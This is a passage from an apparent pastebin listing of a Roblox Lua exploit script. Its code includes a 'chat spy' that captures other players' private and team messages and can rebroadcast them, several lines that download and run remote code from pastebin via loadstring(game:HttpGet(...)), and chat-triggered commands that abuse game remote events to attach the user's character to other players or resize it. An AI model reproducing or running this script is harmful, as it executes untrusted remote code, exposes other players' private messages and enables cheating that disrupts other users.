  591. if packet.SpeakerUserId==p.UserId and packet.Message==msg:sub(#msg-#packet.Message+1) and (channel=="All" or (channel=="Team" and public==false and Players[packet.FromSpeaker].Team==player.Team)) then
  592. hidden = false
  593. end
  594. end)
  595. wait(1)
  596. conn:Disconnect()
  597. if hidden and enabled then
  598. if public then
  599. saymsg:FireServer((publicItalics and "/me " or '').."{SPY} [".. p.Name .."]: "..msg,"All")
  600. else
  601. privateProperties.Text = "{SPY} [".. p.Name .."]: "..msg
  602. StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
  603. end
  604. end
  605. end
  606. end
  607. end
  608.  
  609. for _,p in ipairs(Players:GetPlayers()) do
  610. p.Chatted:Connect(function(msg) onChatted(p,msg) end)
  611. end
  612. Players.PlayerAdded:Connect(function(p)
  613. p.Chatted:Connect(function(msg) onChatted(p,msg) end)
  614. end)
  615. privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}"
  616. StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
  617. if not player.PlayerGui:FindFirstChild("Chat") then wait(3) end
  618. local chatFrame = player.PlayerGui.Chat.Frame
  619. chatFrame.ChatChannelParentFrame.Visible = true
  620. chatFrame.ChatBarParentFrame.Position = chatFrame.ChatChannelParentFrame.Position+UDim2.new(UDim.new(),chatFrame.ChatChannelParentFrame.Size.Y)
  621. end
  622. if msg:lower() == ".dom" then
  623. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  624. wait()
  625. loadstring(game:HttpGet("https://pastebin.com/raw/m2BMpbG4"))()
  626. end
  627. if string.sub(msg,1,6) == ("lnvalid")then
  628. while true do
  629. for i = 0,1,0.1 do
  630. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new(Color3.fromHSV(i,1,1)))
  631. wait(.1)
  632. end
  633. end
  634. end
  635. if string.sub(msg,1,2) == ("re")then
  636. game:GetService("Players").LocalPlayer.Character.Humanoid:ChangeState(15)
  637. end
  638. if string.sub(msg,1,3) == ("'rj")then
  639. game:GetService("TeleportService"):Teleport(game.PlaceId,
  640. game:GetService("Players").LocalPlayer)
  641. end
  642. local gamepassId = IDFORSPAWNER
  643.  
  644. local RobloxianLife = loadstring(game:HttpGetAsync("https://pastebin.com/raw/HTF0vRHF"))()
  645. local CommandApi = loadstring(game:HttpGetAsync("https://pastebin.com/raw/3mHL7pKv"))()
  646. local players = game:GetService("Players")
  647. local localPlayer = players.localPlayer
  648.  
  649. RobloxianLife:Initialize(gamepassId)
  650.  
  651. local function strStarts(String,Start)
  652. return string.sub(String,1,string.len(Start))==Start
  653. end
  654.  
  655. local function getPlayerByName(name)
  656. local plrs = {}
  657.  
  658. if name == "me" then
  659. table.insert(plrs, localPlayer)
  660. return plrs
  661. elseif name == "others" then
  662. for i,v in pairs(players:GetPlayers()) do
  663. if v.Name ~= localPlayer.Name then
  664. table.insert(plrs, v)
  665. end
  666. end
  667. return plrs
  668. elseif name == "all" then
  669. for i,v in pairs(players:GetPlayers()) do
  670. table.insert(plrs, v)
  671. end
  672. return plrs
  673. elseif name == "random" then
  674. table.insert(plrs, players:GetPlayers()[math.random(1, #players:GetPlayers())])
  675. return plrs
  676. end
  677.  
  678. for i,v in pairs(players:GetPlayers()) do
  679. if strStarts(v.Name, name) then
  680. table.insert(plrs, v)
  681. end
  682. end
  683. return plrs
  684. end
  685.  
  686. CommandApi:AddCommand("lnvalid", function(name)
  687. for i,v in pairs(getPlayerByName(name)) do
  688. RobloxianLife:SetLocalProperty(localPlayer.Character.Humanoid, "HipHeight", 0.1)
  689. RobloxianLife:SetLocalProperty(localPlayer.Character.Humanoid.RootPart.RootJoint, "Part1", v.Character:FindFirstChild'Torso' and v.Character.Torso or v.Character.LowerTorso)
  690. end
  691. end)
  692.  
  693. CommandApi:AddCommand("lnvalid", function(mult)
  694. mult = tonumber(mult)
  695. if not mult then return end
  696.  
  697. local function multiplycf(cf, m)
  698. return CFrame.new(cf.p*m)*CFrame.fromOrientation(cf:ToOrientation())
  699. end
  700.  
  701. for i,v in pairs(localPlayer.Character:GetDescendants()) do
  702. if v:isA"BasePart" then
  703. RobloxianLife:SetLocalProperty(v,"Size", v.Size*mult)
  704. elseif v:isA"Motor6D" then
  705. RobloxianLife:SetLocalProperty(v,"C0", multiplycf(v.C0, mult))
  706. RobloxianLife:SetLocalProperty(v,"C1", multiplycf(v.C1, mult))
  707. end
  708. end
  709. end)
  710.  
  711. local chatConnection = localPlayer.Chatted:Connect(CommandApi.OnChatted)
  712.  
  713. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement